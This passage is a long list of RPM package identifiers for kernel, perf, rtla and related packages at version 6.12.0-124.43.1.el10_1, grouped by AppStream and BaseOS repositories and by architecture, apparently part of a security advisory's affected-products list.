"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
